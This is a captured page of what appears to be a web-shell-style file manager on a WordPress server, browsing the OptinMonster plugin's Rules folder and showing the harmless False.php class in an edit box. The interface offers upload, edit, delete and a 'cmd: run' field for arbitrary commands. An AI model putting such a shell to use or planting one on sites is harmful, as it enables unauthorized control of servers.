/
home
/
techb158
/
public_html
/
wp-content
/
plugins
/
optinmonster
/
OMAPI
/
Rules
/
/home/techb158/public_html/wp-content/plugins/optinmonster/OMAPI/Rules
mkdir
upload
Name
Size
Mode
Actions
Base.php
1747
0666
edit
dl
rm
Exception.php
1752
0666
edit
dl
rm
False.php
327
0666
edit
dl
rm
True.php
323
0666
edit
dl
rm
Edit:
/home/techb158/public_html/wp-content/plugins/optinmonster/OMAPI/Rules/False.php
(327B)
<?php /** * OMAPI_Rules_False class. * * @since 1.5.0 * * @package OMAPI * @author Justin Sternberg */ // Exit if accessed directly. if ( ! defined( 'ABSPATH' ) ) { exit; } /** * Rules exception false class. * * @since 1.5.0 */ class OMAPI_Rules_False extends OMAPI_Rules_Exception { protected $bool = false; }
Save
cmd:
run